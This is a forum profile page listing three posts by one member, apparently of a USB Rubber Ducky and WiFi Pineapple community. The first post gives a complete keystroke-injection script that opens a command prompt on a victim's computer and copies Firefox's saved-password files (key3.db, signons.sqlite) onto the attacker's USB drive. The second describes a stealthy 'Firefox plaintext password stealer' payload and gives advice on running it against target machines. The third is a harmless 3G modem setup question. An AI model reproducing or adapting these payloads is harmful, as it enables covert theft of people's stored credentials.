Jump to content

Splosh

Active Members
  • Posts

    15
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Splosh's Achievements

Newbie

Newbie (1/14)

  1. This works much better. Huge thanks to You! Here's my script GUI R DELAY 100 STRING cmd ENTER DELAY 150 STRING cd %homepath%/AppData/Roaming/Mozilla/Firefox/Profiles ENTER STRING cd SPACE TAB ENTER STRING COPY key3.db %homepath%\Contacts ENTER STRING COPY signons.sqlite %homepath%\Contacts ENTER STRING MOVE /Y %homepath%\Contacts\key3.db G: ENTER UPARROW LEFTARROW BACKSPACE STRING F ENTER UPARROW LEFTARROW BACKSPACE STRING E ENTER UPARROW LEFTARROW BACKSPACE STRING D ENTER STRING MOVE /Y %homepath%\Contacts\signons.sqlite G: ENTER DELAY 200 UPARROW LEFTARROW BACKSPACE STRING F ENTER DELAY 200 UPARROW LEFTARROW BACKSPACE STRING E ENTER DELAY 200 UPARROW LEFTARROW BACKSPACE STRING D ENTER DELAY 200 STRING exit ENTER
  2. Firefox plaintext password stealer I utilized Overwraith's (?) windows hiding feature and figured the rest out through trial and error. The script tries to be as stealthy as possible about what's happening, but that slows down the run speed from 12s to 15s and to it may look even more suspicious when windows are trying to hide themselves. The Hiding sections are separated with comments so you can remove them rather easily. The delay times are somewhat strict, you may need to do play with them to make it work on a slower machine. I went for tab + arrow navigation to make it more suitable for multi-lingual use compared to alt+letter navigation. I had some problems with REM and REPEAT commands (Used the Duck Encoder 2.2 and naked Duck version 2 firmware) so the code has been stripped from the hundreds of DOWNARROW commands. Things to keep in mind If firefox starts in full screen mode it won't hide itself. The script however still does what it needs to. The navigation to settings assumes the browser is using firefox default start page (with six quick navigation icons in the bottom). If the target machine is using custom home-page, for en_US browser change "Within FF, scroll to settings" to ALT T Delay 50 STRING O DELAY 200 If the passwords saved in firefox are secured with master password, the script simply won't work. Important Firefox memorizes the last settings-tab used. AFAIK Ducky can't navigate to a specific tab but it can scroll in between them so make sure settings were closed with the general tab open before running the script. Otherwise you'll end up with an image of language settings or worse. This is the first bigger one I've made so feedback is appreciated ^_^ The Script
  3. I recently got myself a Huawei E353 (12d1:14db) and I'm having issues making it work. Pineapple firmware is 2.4.1. I get errors when executing these lines. root@Pineapple:~# ls /dev/ttyUSB* ls: /dev/ttyUSB*: No such file or directory root@Pineapple:~# insmod usbserial vendor=0x12d1 product=0x14db insmod: can't insert 'usbserial': File exists root@Pineapple:~# lsusb Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 001 Device 014: ID 12d1:14db Huawei Technologies Co., Ltd. (also, the huawei is disappearing a while after it has been plugged in) The 3G modem script I have is *12d1:14db*) echo "Huawei Modem E353 detected. Attempting mode switch" uci delete network.wan2 uci set network.wan2=interface uci set network.wan2.ifname=ppp0 uci set network.wan2.proto=3g uci set network.wan2.service=umts uci set network.wan2.device=/dev/ttyUSB0 uci set network.wan2.apn=internet uci set network.wan2.username= uci set network.wan2.password= uci set network.wan2.defaultroute=1 uci commit network usb_modeswitch -v 12d1 -p 14db -V 12d1 -P 14db sleep 10; rmmod usbserial sleep 3; insmod usbserial vendor=0x12d1 product=0x14db sleep 5; /etc/init.d/firewall disable; /etc/init.d/firewall stop logger "3G: firewall stopped" iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o 3g-wan2 -j MASQUERADE iptables -A FORWARD -s 172.16.42.0/24 -o 3g-wan2 -j ACCEPT iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i 3g-wan2 -j ACCEPT APN, username and pwd should be correct I added the product's info to usb_modeswitch folder root@Pineapple:/etc/usb_modeswitch.d# cat 12d1:14db # Huawei E353 DefaultVendor=0x12d1 DefaultProduct=0x14db TargetClass=0xff CheckSuccess=20 HuaweiMode=1 Where should I look into next?
×
×
  • Create New...